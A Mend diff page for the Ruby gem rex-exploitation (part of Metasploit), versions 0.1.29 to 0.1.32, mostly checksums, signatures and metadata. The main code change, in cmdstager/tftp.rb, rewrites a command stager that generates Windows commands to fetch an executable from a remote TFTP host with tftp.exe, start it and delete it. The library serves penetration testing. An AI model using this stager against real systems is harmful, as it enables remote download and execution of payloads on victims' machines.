RubyGems - rex-exploitation - Versions diffs - 0.1.29 → 0.1.32 - Mend

rex-exploitation 0.1.29 → 0.1.32

Files changed (8) hide show

checksums.yaml +4 -4
checksums.yaml.gz.sig +2 -1
data/.github/workflows/verify.yml +1 -0
data/lib/rex/exploitation/cmdstager/tftp.rb +35 -23
data/lib/rex/exploitation/version.rb +1 -1
data.tar.gz.sig +0 -0
metadata +2 -2
metadata.gz.sig +1 -2

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: e69e2bed1ac177b2484539a5a0230a220022f71076033698346c7c83fe1c2128
-  data.tar.gz: 73d249b1347e340fb3517d21f61b6936310ab5c761bdc4fa65cfcd1ea9a50bcd
+  metadata.gz: ea51688315db43ddb2a980d72a715dbe8f7eaf59613df153392b2bcb10735eb0
+  data.tar.gz: d2278d504b70b8db76031c45669a87ae25377c595e318efae605732beaaf79a6
 SHA512:
-  metadata.gz: c3c25edfd7431681b7b94bb8bef1d66b237c9e62354476c3aed8debc771efc816ab27f24e5c12ba4ac2d13f87ab1f7a52ec99c5f737bb30e970fdbf97ace0e33
-  data.tar.gz: 80291e0d18a9c84033a04b13d0d1cd512ffe039ae12fac397abbe2bfdf4a961ed16b347107e0d20939322e0808c62887d344be07efacd5de08d49a59129cbd99
+  metadata.gz: c3dcf1ca77715c531385068d818183d3a130551a9505fb281be4cc26a3d24b9166235acce86474370195eec466b1a416fe83b0286fd787bd393956317733d827
+  data.tar.gz: f7c73e02aca2da10019466617de38c0ca728c592a0420faaee0972911364be5c00673b694f1ad2510728aa94aa72230ef9cdf8311716c4528dbf6a2ebe3b7172

checksums.yaml.gz.sig CHANGED Viewed

@@ -1 +1,2 @@
-i�ЙG�f�3��kZ�~�V:Ԡt1��W�7&��DNu�]vR?O�
+E{�:��l��+̚[J�����G���ٳJ���ɧ|�dZi���jy�&��S�����?�f��k3<
+�7���ocp����'կ�z5$uX4�Tt7vaVv�bre{�D�����hͺ^]��q�	���<N�)�y'���Y�l�[�r߄ko5+��j��zM`��3��Z�-��H��]�@M|����-�P��x�_��ۨ~����x�ci��{	�Yp�OS��!�J���,����p��F��|

data/.github/workflows/verify.yml CHANGED Viewed

@@ -20,6 +20,7 @@ jobs:
           - 2.6
           - 2.7
           - 3.0
+          - 3.1
         test_cmd:
           - bundle exec rspec

data/lib/rex/exploitation/cmdstager/tftp.rb CHANGED Viewed

@@ -13,7 +13,7 @@ module Exploitation
 # be written to disk and executed.
 #
 # This particular version uses tftp.exe to download a binary from the specified
-# server.  The original file is preserve, not encoded at all, and so this version
+# server. The original file is preserved, not encoded at all, and so this version
 # is significantly simpler than other methods.
 #
 # Requires: tftp.exe, outbound udp connectivity to a tftp server
@@ -24,14 +24,24 @@ module Exploitation
 class CmdStagerTFTP < CmdStagerBase
-  def initialize(exe)
-    super
-    @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
+  def generate(opts = {})
+    if opts[:tftphost].nil?
+      raise "#{self.class.name}##{__callee__} missing opts[:tftphost]"
+    end
+    opts[:linemax] ||= @linemax
+    opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe"
+    opts[:temp] ||= '%TEMP%'
+    @payload_exe = opts[:file]
+    @payload_path = opts[:temp] == '.' ? opts[:file] : "#{opts[:temp]}\\#{opts[:file]}"
+    generate_cmds(opts)
   end
   def setup(mod)
     self.tftp = Rex::Proto::TFTP::Server.new
-    self.tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
+    self.tftp.register_file(@payload_exe, exe)
     self.tftp.start
     mod.add_socket(self.tftp) # Hating myself for doing it... but it's just a first demo
   end
@@ -40,28 +50,30 @@ class CmdStagerTFTP < CmdStagerBase
     self.tftp.stop
   end
-  #
-  # We override compress commands just to stick in a few extra commands
-  # last second..
-  #
-  def compress_commands(cmds, opts)
-    # Initiate the download
-    cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"
-    # Make it all happen
-    cmds << "start #{@tempdir + @payload_exe}"
-    # Clean up after unless requested not to..
-    if (not opts[:nodelete])
-      # XXX: We won't be able to delete the payload while it is running..
+  def generate_cmds_payload(opts)
+    cmds = []
+    # We can skip the destination argument if we're writing to the working directory,
+    # as tftp defaults to writing the file to the current directory with the same filename.
+    if opts[:file] == @payload_path
+      cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]}"
+    else
+      cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:file]} \"#{@payload_path}\""
     end
+    cmds
+  end
+  def generate_cmds_decoder(opts)
+    cmds = []
+    cmds << "start \"#{@payload_path}\""
+    # NOTE: We can't delete the payload while it is running.
+    cmds << "del \"#{@payload_path}\"" unless opts[:nodelete]
+    cmds
+  end
-    super
+  def cmd_concat_operator
+    ' & '
   end
-  # NOTE: We don't use a concatenation operator here since we only have a couple commands.
-  # There really isn't any need to combine them. Also, the ms01_026 exploit depends on
-  # the start command being issued separately so that it can ignore it :)
   attr_reader :exe
   attr_reader :payload_exe
   attr_accessor :tftp

data/lib/rex/exploitation/version.rb CHANGED Viewed

@@ -1,5 +1,5 @@
 module Rex
   module Exploitation
-    VERSION = "0.1.29"
+    VERSION = "0.1.32"
   end
 end

data.tar.gz.sig CHANGED Viewed

Binary file

metadata CHANGED Viewed

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: rex-exploitation
 version: !ruby/object:Gem::Version
-  version: 0.1.29
+  version: 0.1.32
 platform: ruby
 authors:
 - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
   EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
   9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
   -----END CERTIFICATE-----
-date: 2022-03-07 00:00:00.000000000 Z
+date: 2022-07-11 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rake

metadata.gz.sig CHANGED Viewed

@@ -1,2 +1 @@
-/'��JF��-���gbE���g����f�j��O�';7S�Q�4�]O�ԟ���7���|?R�ZBc`6�9�0��
-T?�f��*�@�h�JIDר	Aĩ5H�:!RȽE�o��!П�}c�i�����7�;�Ns��>��-j�L�푵����R+� e��L?-qoݽX���z￉"To"~BH,���n���'�.��δ�I�r��53V݋ˬ�B�����4h䆅в_҄VIc�̠۽�
+�����{���O?��yӬa��llÑ;�6�m2Q�|k`_�Ⱦ�-��Lnr�҄�Q�`���lN8�V���y��$d����ĖY������П��yF_�@�����d\U77b�q�ⵥ���Y��t�Ն�O�x�A(�A�ڊ��t���I+�U*Q^�E	��*<G������{���^��S^����V���!���a���ٮ��9���ES���m����x��,w����=*�xPV�<